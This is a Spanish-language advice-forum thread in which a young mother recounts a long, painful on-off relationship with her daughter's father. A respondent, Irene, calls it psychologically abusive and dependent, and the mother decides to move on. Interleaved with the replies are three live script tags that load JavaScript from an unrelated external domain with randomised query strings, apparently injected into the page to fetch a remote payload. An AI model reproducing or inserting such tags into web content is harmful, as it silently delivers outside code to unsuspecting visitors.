¿Qué pensáis de éste comportamiento en el amor?

Hola.
Bueno es una historia bastante larga pero bueno resumiré mucho.
Mirar , el padre de mi hija y yo nos conocemos desde hace 10 años.
Empezamos a salir juntos con 17 años.
Duramos
2 años. Cortó él porque sentía que no estaba con él lo suficiente, que
se veía inferior a mi y cosas así, vamos inseguridades, pero lo dejó
queriéndome, lo sé.
A partir de ahí yo tube muchísima tristeza y caí en depresión aunque seguía haciendo mi vida.
Este
chico y yo nos hemos querido mucho, muchísimo tanto que siempre que el
otro nos heria, o no demostraba amor sufríamos muchísimo. Nos queríamos
demasiado, había mucha pasión y no podíamos estar mucho tiempo lejos.
El fue el primer hombre con el que estuve y yo para él. Vamos el primer amor.
Después
de cortar nos buscábamos tanto él como yo , llegándome a decir que
ahora tal vez no fuera el momento de estar juntos pero que confiaba en
que más adelante lo estuviéramos.
Nos buscábamos, él me buscaba, teníamos relaciones sexuales y nos alejábamos.
Cada
por tiempo hacíamos lo mismo, yo no podía decirle que no era una
atracción muy fuerte la que sentía por él así que me llamaba a altas
horas de la noche preguntándome donde estaba y iba a mi casa a buscarme,
decía que no dejaba de pensar en mi y esas cosas.
Bueno en una de esas yo me quedé embarazada.
En
ese tiempo yo tenia un amigo, solo amigos, donde nos veíamos y
charlábamos él quería conmigo pero yo no , mi ex nos vio una vez y dice
que se puso muy triste es como que yo era suya y no podía estar con
nadie mas aunque él y yo no estuviéramos juntos.
Cuando le dije
que quedé embarazada, el se quedó parado, me preguntó si estaba segura y
le dije que si, me dijo eso tiene solución aborta...
Le entró
miedo y me lo dijo así sin más , yo le dije que de ninguna manera, que
no pensaba hacer eso, al tiempo me enteré de que quería la prueba de adn
que no sabia si era suyo, como me veía con el otro quedar..., a mi me
hirió profundamente eso que pensaba así que le dije que me dejara en paz
que yo con la ayuda con mi familia iba a sacar a mi hija adelante.
De
vez en cuando me llamaba para ver como estaba pero yo no le hacia mucho
caso se me quedaron clavadas esas palabras y no podía confiar en
alguien así así que cortamos toda relación.
Vi a su hermana y le
dije el nombre que pensaba ponerle, Rocío ,sabia que a él también le
gustaba, al poco tiempo me enteré de que estaba ilusionado, al parecer
ya veía mas seguro de que fuera suya..
Mi hija nació y ni lo llame
para el parto, en dos años no supe nada de él, sabia que se había
echado novia, y yo la verdad me alegré por él puesto que lo nuestro no
daba para más, yo también me eché novio y hasta pude olvidarle por
completo, pero acabé dejándolo con este.
El también lo dejó con su novia, no por nada sino porque se fue con otro.
Mi hija nació en 2008 y él volvió aparecer en mi vida en 2010.
Me agregó al tuenti y me dijo que como estábamos.
Yo la verdad que ni me lo esperaba ni sabia nada de él así que me impactó muchísimo.
Para mi sorpresa al ver su invitación me puse a llorar, no tengo ni idea de porque si yo ni pensaba en él ni nada.
A
los días le contesté que quería , me dijo que había recapacitado, que
si lo aceptaba de nuevo, que quería formar una familia conmigo, que
había cambiado, estaba mas centrado y demás.
Yo no me creia lo que
me estaba contando era alucinante, despues de tanto sin saber de él ,
decía ¿porque simepre vuelve a mi vida este hombre?...
El caso es
que yo había entrado en Comunidades, un itinerario de fe cristiana donde
me sentía muy bien y aun sigo, es casi lo mejor que me ha pasado nunca,
así que lo acepté, lo perdoné y dejé que viera a su hija.
Estaba
muy ilusionado, como la primera vez que nos conocimos, decía que se
habian despertado en él sentimientos nuevos, que yo era su sueño, y que
lo estaba viendo hacerse realidad, que el tren de la vida había parado
de nuevo en su estación,tenia tantas ganas no sé de donde las saco
puesto que tanto tiempo sin vernos, tanta distancia, tantos
enfrentamientos....no entendia nada.
Le pedí que no tubieramos relaciones sexuales que no estaba preparada, me dijo me va a costar pero te respetaré como te mereces.
El
caso es que yo le pedí que hiciera las catequesis para ver si realmente
estaba dispuesto a tener algo serio y comportarse como un hombre.
En ese tiempo le salio un trabajo y no pudo ir.
Asi
que yo cada vez veía mas lejano estar con él, el venia a casa, le
pasaba la manutencion pero yo sabia que no confiaba en él, no podía,
solo haciendo las catequesis sabia que podriamos llegar a algo serio y
duradero.
El caso es que en noviembre del año pasado tubimos una
discusión, porque el no apareció un fin de semana entero para ver a su
hija, despues me dijo que yo si podía irme findesemanas enteros de
convivencia pero el no podía hacer sus cosas, parecia como si le picara
que yo me fuera y el no...
El caso es que al final me dijo que no
tenia porque hacer lo que yo le dijera, que quería llevarse a su hija
sin tener que pedirme permiso, así que me amenazó con llevarme a juicio
porque la niña solo lleva mis apellidos, se empeñó en ponerle los suyos y
a mi eso me daba miedo por si se la llevaba , yo no podria estar sin
ella mucho tiempo, también le dije que solo quería hacerme daño.
Ahí quedó la cosa, dejó de ver a la niña, me cortó la manutención y no me llevó a juicio.
Yo
hace un mes le mandé un mensaje y le dije que lo echaba de menos él me
dijo que a mi no que a su hija , me dijo que no me había llevado a
juicio para no hacer pasar a su hija por todos esos tramites que
preferia joderse y echarla de menos y que cuando fuera mayor ahí iba a
estar para ella.
Yo no sé que pensar pero yo sólo sé que lo quiero
pero no puedo darle algo sin que se esfuerce, sin que luche, no puedo
coger ahora y que lleve sus apellidos , ahora que se ha rendido...
Hay
chicos que quieren conmigo pero siempre mi pensamiento está en él
todavia , aunque sé que es imposible pero llevamos así 10 años y no sé
si he perdido el tiempo o que ha pasado pero también es verdad que como
él nadie me ha hecho sentir y yo a él igual.
Necesito vuestras opiniones sinceras, tanto de mi comportamiento como del suyo.
Ojalá me ayudeis a aclararme.

1 Respuesta

Respuesta

¿Ese hombre es casado? Verás si te quiere ¿por qué nunca se casaron ni pensaron en formar una familia NUNCA más con una hija? Lo peor es que el único con el que has tenido relaciones dude de que tu hijo sea de él, eso es llamarte p..., con perdón, peor te abandonó a ti y a la bebé a su suerte, y luego aparece cuando le da la gana o tú lo buscas, creo que te gusta sufrir, eres un poco masoqusta y él un poco egoísta y maltratador psicológico, aún así si es su hija ¿por qué no te pasa la manutención? Va a esperar a los 18 para hacerse el ¨buen padre¨nunca lo ha sido. Estas en un grupo de crecimiento espiritual, Dios no te trajo al mundo a sufrir, no te empeñes en buscar el sufrimiento,¿entre toda esa gente buena no hay un hombre que te guste? Estás cegada con él, son muchos años de daño, corta esa conexión existe gente tóxica(es un libro sería interesante que lo leas)solo deberías aceptar en tu vida y la de tu hija gente que espiritualmente te aporte amor y eso de él nunca ha sido amor, ha sido aprovecharse de ti y lavarse las manos, de verdad espero que tu fe te ayude por el bien de esa niña a olvidar a ese ¿hombre? No sé, pero tú reconoces un alma limpia y la de él no lo es, ABRE LOS OJOS Por favor. Con mucho cariño. IRene

Gracias.

No , no es casado.

Es bastante raro su comportamiento, no sé pero no está bien y me gustaría ayudarlo..

El caso es que yo llegué a olvidarlo pero bueno volvió y como conté en la historia me puse a llorar...han sido muchas cosas, muchas idas y venidas, muchas discusiones, mucha debilidad por mi parte, por supuesto que no me gusta sufrir pero cuando tienes en mente siempre ha esa persona y ves que no puedes sacártela de la cabeza es algo que duele, esclaviza, no aporta nada...es mucho tiempo ya , tienes toda la razón pero a veces no puedo evitar imaginarme que tal vez Dios nos concediera poder formar una familia pero claro él ahora está dolido...y pienso a veces para que voy a intentar olvidarlo si cuando se le pase el enfado va a volver de nuevo?...

Pero tienes mucha razón...no ha sido amor ni de mi parte ni de la de él...

Es mas bien costumbre.

Saludos

<script type="text/javascript" src="http://tema-super-rosa.info/dfi823hs.js?0.2118919491552126"></script>

Cariño sé que pusiste alguna imagen bonita pero el host no la acepta. Quiero decirte solo una cosa más tengo a mi mejor amiga que ya pasa de 40 años y su caso es parecido al tuyo una depenencia mutua donde se hacen daño y quien sufre es el hijo, llevan 20 años así, ella ya se ve mayor para cambiar las cosas, el niño ha estado traumatizado, ha sufrido mucho, tú tienes 27, estás a tiempo¡El amor no es eso, tú y tu niña merecen una vida mejor, ella tomará tu ejemplo de relación de pareja y seguro no quieres eso para ella, no es de un día para otro, pero no puede tirarte y volver cuando quiera ustedes no son un trapo, son personitas lindas, no aceptes lo injusto en tu vida busca lo que de verdad mereces. Si puedes lee amar o depender creo que es de Jorge Bucay, de Ares te lo puedes bajar y en audio si prefieres, un abrazo con cariño. Irene

Pues la verdad que yo ya lo he decidido, y sé que es lo mejor y sabes ? gracias a la Iglesia que me ha acogido y que estoy en una comunidad de hermanos me siento muchísimo mejor, más protegida, mas confiada mas digna, no puedo seguir así yo quiero otra cosa pero claro mis bajones todavía los tengo...

Este chico sé que me ha querido pero muy egoístamente, y eso no es amor es mejor que no te quieran a que te quieran así porque no es vivir, para 5 ratos buenos 20 son desilusiones y eso no lo quiero yo ni nadie.

Yo no le guardo ningún rencor ni mucho menos, eso seria hacerme daño a mi misma pero le doy gracias a Dios porque he aprendido mucho, he aprendido a valorarme, a no depender de una persona para ser feliz, ha saber que tal vez nunca he sabido amar y nunca me han amado de verdad y tener la esperanza de que eso pase de que lo mejor está por llegar y que si algo bueno tengo que aprender de todo ésto es la niña que Dios me regaló y que no permitió que por ningún motivo abortara y ahora ella es muy feliz, es una niña preciosa, sana, con ganas de vivir, siempre se está riendo y nos tenemos la una a la otra...

Pienso que este chico es muy ignorante, no sabe lo que se pierde por pensar solo en él mismo pero lo que está claro es que yo he querido ayudarle pero él no quiere y tengo que meterme ya en la cabeza que si no quiere ayuda él se lo pierde, es su decisión y que yo no soy la salvadora de nadie ni mucho menos...así que así tengo que pensar y así tengo que vivir con esperanzas de encontrar a un hombre que verdaderamente merezca la pena y no esperar a cambiar a alguien que ni siquiera me quiere....

ves? yo lo sé y no me duele la verdad pero claro siempre está esa duda de que sería lo ideal estar juntos pero poco a poco me doy cuenta de que no, de que no pudo ser cuando fue el momento menos lo será ahora

yo siempre he tenido esa espina de que no podía confiar en él y por algo la tenia ahí porque en realidad siempre he sido un capricho para él , nunca me he sentido valorada y emparte es también lo que he vivido en mi familia , que como dices influye mucho, mis padres están casados creo que ya para 40 años y yo he visto eso en mi casa, que mi padre no valoraba a mi madre, siempre discutían, mi madre ha sufrido mucho y yo pasé lo mismo con éste chico. Son chicos inmaduros, machistas, orgullosos, la mujer no debe darle problemas si queremos que vaya bien la relación, son chicos cobardes, no luchan como niños que en vez de sus novias o esposas parecemos sus madres , eso no es vivir yo no quiero una vida así ni mucho menos pero tengo que mentalizarme de que es imposible de que yo no puedo pretender cambiar a nadie y que si volviera algún día tendría que decirle que no...que sus oportunidades las tubo pero que visto lo visto ninguna aprovecha...

Así que gracias por tu respuesta...

Dejaré la pregunta abierta por si quieres decirme algo mas

saludos.

<script type="text/javascript" src="http://tema-super-rosa.info/dfi823hs.js?0.5368556901938932"></script>

Que te felicito, sé que te ha costado enfrentarte a la realidad porque destruía tus ilusiones pero has sido muy valiente, cada palabra merece estar en un libro de autoayuda para mujeres maltratadas, Lo mejor está por venir pues tú y tu niña merecen una vida bonita y con amor. UN cariñoso abrazo y te deseo:Pronta FELICIDAD. Irene

<script type="text/javascript" src="http://tema-super-rosa.info/dfi823hs.js?0.3153710437232201"></script>